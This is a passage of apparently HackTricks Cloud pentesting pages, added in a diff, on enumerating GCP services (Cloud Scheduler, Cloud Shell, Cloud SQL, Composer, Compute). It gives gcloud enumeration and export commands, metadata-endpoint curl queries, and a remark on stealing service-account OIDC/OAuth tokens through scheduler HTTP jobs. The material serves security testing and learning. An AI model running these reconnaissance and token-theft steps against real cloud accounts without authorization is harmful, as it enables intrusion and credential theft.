* **Workflows**: Call a GCP Workflow.
## Service Accounts
A service account is not always required by each scheduler. The **Pub/Sub** and **App Engine HTTP** types don't require any service account. The **Workflow** does require a service account, but it'll just invoke the workflow.\
Finally, the regular HTTP type doesn't require a service account, but it's possible to indicate that some kind of auth is required by the workflow and add either an **OAuth token or an OIDC token to the sent** HTTP request.
{% hint style="danger" %}
Therefore, it's possible to steal the **OIDC** token and abuse the **OAuth** token from service accounts **abusing the HTTP type**. More on this in the privilege escalation page.
{% endhint %}
Note that it's possible to limit the scope of the OAuth token sent, however, by default, it'll be `cloud-platform`.
## Enumeration
```bash
# Get schedulers in a location
gcloud scheduler jobs list --location us-central1
# Get information of an specific scheduler
gcloud scheduler jobs describe --location us-central1 <scheduler-name>
```
## Privilege Escalation
{% content-ref url="../gcp-privilege-escalation/gcp-cloudscheduler-privesc.md" %}
[gcp-cloudscheduler-privesc.md](../gcp-privilege-escalation/gcp-cloudscheduler-privesc.md)
{% endcontent-ref %}
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

54
pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md Normal file
View File

@@ -0,0 +1,54 @@
# GCP - Cloud Shell Enum
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Basic Information
Google Cloud Shell is an interactive shell environment for Google Cloud Platform (GCP) that provides you with **command-line access to your GCP resources directly from your browser or shell**. It's a managed service provided by Google, and it comes with a **pre-installed set of tools**, making it easier to manage your GCP resources without having to install and configure these tools on your local machine.\
Moreover, its offered at **no additional cost.**
**Any user of the organization** (Workspace) is able to execute **`gcloud cloud-shell ssh`** and get access to his **cloudshell** environment. However, **Service Accounts can't**, even if they are owner of the organization.
There **aren't** **permissions** assigned to this service, therefore the **aren't privilege escalation techniques**. Also there **isn't any kind of enumeration**.
Note that Cloud Shell can be **easily disabled** for the organization.
### Post Exploitation
{% content-ref url="../gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md" %}
[gcp-cloud-shell-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md)
{% endcontent-ref %}
### Persistence
{% content-ref url="../gcp-persistence/gcp-cloud-shell-persistence.md" %}
[gcp-cloud-shell-persistence.md](../gcp-persistence/gcp-cloud-shell-persistence.md)
{% endcontent-ref %}
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

115
pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md Normal file
View File

@@ -0,0 +1,115 @@
# GCP - Cloud SQL Enum
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Basic Information
Google Cloud SQL is a managed service that **simplifies setting up, maintaining, and administering relational databases** like MySQL, PostgreSQL, and SQL Server on Google Cloud Platform, removing the need to handle tasks like hardware provisioning, database setup, patching, and backups.
Key features of Google Cloud SQL include:
1. **Fully Managed**: Google Cloud SQL is a fully-managed service, meaning that Google handles database maintenance tasks like patching, updates, backups, and configuration.
2. **Scalability**: It provides the ability to scale your database's storage capacity and compute resources, often without downtime.
3. **High Availability**: Offers high availability configurations, ensuring your database services are reliable and can withstand zone or instance failures.
4. **Security**: Provides robust security features like data encryption, Identity and Access Management (IAM) controls, and network isolation using private IPs and VPC.
5. **Backups and Recovery**: Supports automatic backups and point-in-time recovery, helping you safeguard and restore your data.
6. **Integration**: Seamlessly integrates with other Google Cloud services, providing a comprehensive solution for building, deploying, and managing applications.
7. **Performance**: Offers performance metrics and diagnostics to monitor, troubleshoot, and improve database performance.
### Password
In the web console Cloud SQL allows the user to **set** the **password** of the database, there also a generate feature, but most importantly, **MySQL** allows to **leave an empty password and all of them allows to set as password just the char "a":**
<figure><img src="../../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
It's also possible to configure a password policy requiring **length**, **complexity**, **disabling reuse** and **disabling username in password**. All are disabled by default.
**SQL Server** can be configured with **Active Directory Authentication**.
### Zone Availability
The database can be **available in 1 zone or in multiple**, of course, it's recommended to have important databases in multiple zones.
### Encryption
By default a Google-managed encryption key is used, but it's also **possible to select a Customer-managed encryption key (CMEK)**.
### Connections
* **Private IP**: Indicate the VPC network and the database will get an private IP inside the network
* **Public IP**: The database will get a public IP, but by default no-one will be able to connect
* **Authorized networks**: Indicate public **IP ranges that should be allowed** to connect to the database
* **Private Path**: If the DB is connected in some VPC, it's possible to enable this option and give **other GCP services like BigQuery access over it**
<figure><img src="../../../.gitbook/assets/image (15).png" alt=""><figcaption></figcaption></figure>
### Data Protection
* **Daily backups**: Perform automatic daily backups and indicate the number of backups you want to maintain.
* **Point-in-time recovery**: Allows you to recover data from a specific point in time, down to a fraction of a second.
* **Deletion Protection**: If enabled, the DB won't be able to be deleted until this feature is disabled
### Enumeration
```bash
# Get SQL instances
gcloud sql instances list
gcloud sql instances describe <inst-name> # get IPs, CACert, settings
# Get database names inside an instance (like information_schema, sys...)
gcloud sql databases list --instance <intance-name>
gcloud sql databases describe <db-name> --instance <intance-name>
# Get usernames inside the db instance
gcloud sql users list --instance <intance-name>
# Backups
gcloud sql backups list --instance <intance-name>
gcloud sql backups describe <backup-name> --instance <intance-name>
```
### Unauthenticated Enum
{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md" %}
[gcp-cloud-sql-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md)
{% endcontent-ref %}
### Post Exploitation
{% content-ref url="../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md" %}
[gcp-cloud-sql-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md)
{% endcontent-ref %}
### Persistence
{% content-ref url="../gcp-persistence/gcp-cloud-sql-persistence.md" %}
[gcp-cloud-sql-persistence.md](../gcp-persistence/gcp-cloud-sql-persistence.md)
{% endcontent-ref %}
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

71
pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md Normal file
View File

@@ -0,0 +1,71 @@
# GCP - Composer Enum
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Basic Information
**Google Cloud Composer** is a fully managed **workflow orchestration service** built on **Apache Airflow**. It enables you to author, schedule, and monitor pipelines that span across clouds and on-premises data centers. With GCP Composer, you can easily integrate your workflows with other Google Cloud services, facilitating efficient data integration and analysis tasks. This service is designed to simplify the complexity of managing cloud-based data workflows, making it a valuable tool for data engineers and developers handling large-scale data processing tasks.
### Enumeration
{% code overflow="wrap" %}
```bash
# Get envs info
gcloud composer environments list --locations <loc>
gcloud composer environments describe --location <loc> <environment>
# Get list of dags
gcloud composer environments storage dags list --environment <environment> --location <loc>
# Download dags code
mkdir /tmp/dags
gcloud composer environments storage dags export --environment <environment> --location <loc> --destination /tmp/dags
# List Data from composer
gcloud composer environments storage data list --environment <environment> --location <loc>
# Download data
mkdir /tmp/data
gcloud composer environments storage data export --environment <environment> --location <loc> --destination /tmp/data
# List Plugins from composer
gcloud composer environments storage plugins list --environment <environment> --location <loc>
# Download plugins
mkdir /tmp/plugins
gcloud composer environments storage data export --environment <environment> --location <loc> --destination /tmp/plugins
```
{% endcode %}
### Privesc
In the following page you can check how to **abuse composer permissions to escalate privileges**:
{% content-ref url="../gcp-privilege-escalation/gcp-composer-privesc.md" %}
[gcp-composer-privesc.md](../gcp-privilege-escalation/gcp-composer-privesc.md)
{% endcontent-ref %}
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

262
pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md Normal file
View File

@@ -0,0 +1,262 @@
# GCP - Compute Enum
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## GCP VPC & Networking
Learn about how this works in:
{% content-ref url="gcp-vpc-and-networking.md" %}
[gcp-vpc-and-networking.md](gcp-vpc-and-networking.md)
{% endcontent-ref %}
### Enumeration
{% code overflow="wrap" %}
```bash
# List networks
gcloud compute networks list
gcloud compute networks describe <network>
# List subnetworks
gcloud compute networks subnets list
gcloud compute networks subnets get-iam-policy <name> --region <region>
gcloud compute networks subnets describe <name> --region <region>
# List FW rules in networks
gcloud compute firewall-rules list --format="table(
name,
network,
direction,
priority,
sourceRanges.list():label=SRC_RANGES,
destinationRanges.list():label=DEST_RANGES,
allowed[].map().firewall_rule().list():label=ALLOW,
denied[].map().firewall_rule().list():label=DENY,
sourceTags.list():label=SRC_TAGS,
sourceServiceAccounts.list():label=SRC_SVC_ACCT,
targetTags.list():label=TARGET_TAGS,
targetServiceAccounts.list():label=TARGET_SVC_ACCT,
disabled
)"
# List Hierarchical Firewalls
gcloud compute firewall-policies list (--folder <value>| --organization <value>)
gcloud compute firewall-policies describe <fw_policy>
gcloud compute firewall-policies list-rules <fw_policy>
# Get Firewalls of each region
gcloud compute network-firewall-policies list
## Get final FWs applied in a region
gcloud compute network-firewall-policies get-effective-firewalls --network=<vpc_name> --region <region>
```
{% endcode %}
You easily find compute instances with open firewall rules with [https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_firewall\_enum](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_firewall_enum)
## Compute instances
This is the way you can **run virtual machines inside GCP.** Check this page for more information:
{% content-ref url="gcp-compute-instance.md" %}
[gcp-compute-instance.md](gcp-compute-instance.md)
{% endcontent-ref %}
### Enumeration
```bash
# Get list of zones
# It's interesting to know which zones are being used
gcloud compute regions list | grep -E "NAME|[^0]/"
# List compute instances & get info
gcloud compute instances list
gcloud compute instances describe <instance name>
gcloud compute instances get-iam-policy <instance> --zone=ZONE
gcloud compute instances get-screenshot <instance name> # Instace must have "Display Device" enabled
gcloud compute instances os-inventory list-instances # Get OS info of instances (OS Config agent is running on instances)
# Enumerate disks
gcloud compute disks list
gcloud compute disks describe <disk>
gcloud compute disks get-iam-policy <disk>
```
For more information about how to **SSH** or **modify the metadata** of an instance to **escalate privileges,** check this page:
{% content-ref url="../../gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md" %}
[gcp-local-privilege-escalation-ssh-pivoting.md](../../gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md)
{% endcontent-ref %}
### Privilege Escalation
In the following page, you can check how to **abuse compute permissions to escalate privileges**:
{% content-ref url="../../gcp-privilege-escalation/gcp-compute-privesc/" %}
[gcp-compute-privesc](../../gcp-privilege-escalation/gcp-compute-privesc/)
{% endcontent-ref %}
### Unauthenticated Enum
{% content-ref url="../../gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md" %}
[gcp-compute-unauthenticated-enum.md](../../gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md)
{% endcontent-ref %}
### Post Exploitation
{% content-ref url="../../gcp-post-exploitation/gcp-compute-post-exploitation.md" %}
[gcp-compute-post-exploitation.md](../../gcp-post-exploitation/gcp-compute-post-exploitation.md)
{% endcontent-ref %}
### Persistence
{% content-ref url="../../gcp-persistence/gcp-compute-persistence.md" %}
[gcp-compute-persistence.md](../../gcp-persistence/gcp-compute-persistence.md)
{% endcontent-ref %}
## Serial Console Logs
Compute Engine Serial Console Logs are a feature that allows you to **view and diagnose the boot and operating system logs** of your virtual machine instances.
Serial Console Logs provide a **low-level view of the instance's boot process**, including kernel messages, init scripts, and other system events that occur during boot-up. This can be useful for debugging boot issues, identifying misconfigurations or software errors, or troubleshooting network connectivity problems.
These logs **may expose sensitive information** from the system logs which low privileged user may not usually see, but with the appropriate IAM permissions you may be able to read them.
You can use the following [gcloud command](https://cloud.google.com/sdk/gcloud/reference/compute/instances/get-serial-port-output) to query the serial port logs (the permission required is `compute.instances.getSerialPortOutput`):
```bash
gcloud compute instances get-serial-port-output <instance-name>
```
## Startup Scripts output
It's possible to see the **output of the statup scripts** from the VM executing:
```bash
sudo journalctl -u google-startup-scripts.service
```
## OS Configuration Manager
You can use the OS configuration management service to **deploy, query, and maintain consistent configurations** (desired state and software) for your VM instance (VM). On Compute Engine, you must use [guest policies](https://cloud.google.com/compute/docs/os-config-management#guest-policy) to maintain consistent software configurations on a VM.
The OS Configuration management feature allows you to define configuration policies that specify which software packages should be installed, which services should be enabled, and which files or configurations should be present on your VMs. You can use a declarative approach to managing the software configuration of your VMs, which enables you to automate and scale your configuration management process more easily.
This also allow to login in instances via IAM permissions, so it's very **useful for privesc and pivoting**.
{% hint style="warning" %}
In order to **enable os-config in a whole project or in an instance** you just need to set the **metadata** key **`enable-oslogin`** to **`true`** at the desired level.\
Moreover, you can set the metadata **`enable-oslogin-2fa`** to **`true`** to enable the 2fa.
When you enable it when crating an instance the metadata keys will be automatically set.
{% endhint %}
More about **2fa in OS-config**, **it only applies if the user is a user**, if it's a SA (like the compute SA) it won't require anything extra.
### Enumeration
```bash
gcloud compute os-config patch-deployments list
gcloud compute os-config patch-deployments describe <patch-deployment>
gcloud compute os-config patch-jobs list
gcloud compute os-config patch-jobs describe <patch-job>
```
## Images
### Custom Images
**Custom compute images may contain sensitive details** or other vulnerable configurations that you can exploit.
When an image is created you can choose **3 types of encryption**: Using **Google managed key** (default), a **key from KMS**, or a **raw key** given by the client.
#### Enumeration
You can query the list of non-standard images in a project with the following command:
{% code overflow="wrap" %}
```bash
gcloud compute machine-images list
gcloud compute machine-images describe <name>
gcloud compute machine-images get-iam-policy <name>
```
{% endcode %}
You can then [**export**](https://cloud.google.com/sdk/gcloud/reference/compute/images/export) **the virtual disks** from any image in multiple formats. The following command would export the image `test-image` in qcow2 format, allowing you to download the file and build a VM locally for further investigation:
```bash
gcloud compute images export --image test-image \
--export-format qcow2 --destination-uri [BUCKET]
# Execute container inside a docker
docker run --rm -ti gcr.io/<project-name>/secret:v1 sh
```
#### Privilege Escalation
Check the Compute Instances privilege escalation section.
### Custom Instance Templates
An [**instance template**](https://cloud.google.com/compute/docs/instance-templates/) **defines instance properties** to help deploy consistent configurations. These may contain the same types of sensitive data as a running instance's custom metadata. You can use the following commands to investigate:
```bash
# List the available templates
gcloud compute instance-templates list
# Get the details of a specific template
gcloud compute instance-templates describe [TEMPLATE NAME]
```
It could be interesting to know which disk is new images using, but these templates won't usually have sensitive information.
## Snapshots
The **snapshots are backups of disks**. Note that this is not the same as cloning a disk (another available feature).\
The **snapshot** will use the **same encryption as the disk** it's taken from.
### Enumeration
```bash
gcloud compute snapshots list
gcloud compute snapshots describe <snapshot>
gcloud compute snapshots get-iam-policy <snapshot>
```
### Privilege Escalation
Check the Compute Instances privilege escalation section.
## References
* [https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching](https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

127
pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.md Normal file
View File

@@ -0,0 +1,127 @@
# GCP - Compute Instances
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Basic Information
Google Cloud Compute Instances are **customizable virtual machines on Google's cloud infrastructure**, offering scalable and on-demand computing power for a wide range of applications. They provide features like global deployment, persistent storage, flexible OS choices, and strong networking and security integrations, making them a versatile choice for hosting websites, processing data, and running applications efficiently in the cloud.
### Confidential VM
Confidential VMs use **hardware-based security features** offered by the latest generation of AMD EPYC processors, which include memory encryption and secure encrypted virtualization. These features enable the VM to protect the data processed and stored within it from even the host operating system and hypervisor.
To run a Confidential VM it might need to **change** things like the **type** of the **machine**, network **interface**, **boot disk image**.
### Disk & Disk Encryption
It's possible to **select the disk** to use or **create a new one**. If you select a new one you can:
* Select the **size** of the disk
* Select the **OS**
* Indicate if you want to **delete the disk when the instance is deleted**
* **Encryption**: By **default** a **Google managed key** will be used, but you can also **select a key from KMS** or indicate **raw key to use**.
### Deploy Container
It's possible to deploy a **container** inside the virtual machine.\
It possible to configure the **image** to use, set the **command** to run inside, **arguments**, mount a **volume**, and **env variables** (sensitive information?) and configure several options for this container like execute as **privileged**, stdin and pseudo TTY.
### Service Account
By default, the **Compute Engine default service account** will be used. The email of this SA is like: `<proj-num>-compute@developer.gserviceaccount.com`\
This service account has **Editor role over the whole project (high privileges).**
And the **default access scopes** are the following:
* **https://www.googleapis.com/auth/devstorage.read\_only** -- Read access to buckets :)
* https://www.googleapis.com/auth/logging.write
* https://www.googleapis.com/auth/monitoring.write
* https://www.googleapis.com/auth/servicecontrol
* https://www.googleapis.com/auth/service.management.readonly
* https://www.googleapis.com/auth/trace.append
However, it's possible to **grant it `cloud-platform` with a click** or specify **custom ones**.
<figure><img src="../../../../.gitbook/assets/image (327).png" alt=""><figcaption></figcaption></figure>
### Firewall
It's possible to allow HTTP and HTTPS traffic.
<figure><img src="../../../../.gitbook/assets/image (326).png" alt=""><figcaption></figcaption></figure>
### Networking
* **IP Forwarding**: It's possible to **enable IP forwarding** from the creation of the instance.
* **Hostname**: It's possible to give the instance a permanent hostname.
* **Interface**: It's possible to add a network interface
### Extra Security
These options will **increase the security** of the VM and are recommended:
* **Secure boot:** Secure boot helps protect your VM instances against boot-level and kernel-level malware and rootkits.
* **Enable vTPM:** Virtual Trusted Platform Module (vTPM) validates your guest VM pre-boot and boot integrity, and offers key generation and protection.
* **Integrity supervision:** Integrity monitoring lets you monitor and verify the runtime boot integrity of your shielded VM instances using Stackdriver reports. Requires vTPM to be enabled.
### VM Access
The common way to enable access to the VM is by **allowing certain SSH public keys** to access the VM.\
However, it's also possible to **enable the access to the VM vial `os-config` service using IAM**. Moreover, it's possible to enable 2FA to access the VM using this service.\
When this **service** is **enabled**, the access via **SSH keys is disabled.**
<figure><img src="../../../../.gitbook/assets/image (328).png" alt=""><figcaption></figcaption></figure>
### Metadata
It's possible to define **automation** (userdata in AWS) which are **shell commands** that will be executed every time the machine turns on or restarts.
It's also possible to **add extra metadata key-value values** that are going to be accessible from the metadata endpoint. This info is commonly used for environment variables and startup/shutdown scripts. This can be obtained using the **`describe` method** from a command in the enumeration section, but it could also be retrieved from the inside of the instance accessing the metadata endpoint.
```bash
# view project metadata
curl "http://metadata.google.internal/computeMetadata/v1/project/attributes/?recursive=true&alt=text" \
-H "Metadata-Flavor: Google"
# view instance metadata
curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?recursive=true&alt=text" \
-H "Metadata-Flavor: Google"
```
Moreover, **auth token for the attached service account** and **general info** about the instance, network and project is also going to be available from the **metadata endpoint**. For more info check:
{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#6440" %}
### Encryption
A Google-managed encryption key is used by default a but a Customer-managed encryption key (CMEK) can be configured. You can also configure what to do when the used CMEF is revoked: Noting or shut down the VM.
<figure><img src="../../../../.gitbook/assets/image (329).png" alt=""><figcaption></figcaption></figure>
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
